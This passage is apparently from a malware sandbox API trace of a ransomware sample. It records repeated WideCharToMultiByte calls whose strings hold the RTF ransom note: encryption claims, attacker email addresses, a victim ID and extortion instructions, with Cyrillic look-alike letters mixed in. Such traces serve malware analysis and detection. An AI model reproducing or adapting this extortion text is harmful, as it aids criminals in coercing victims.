t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 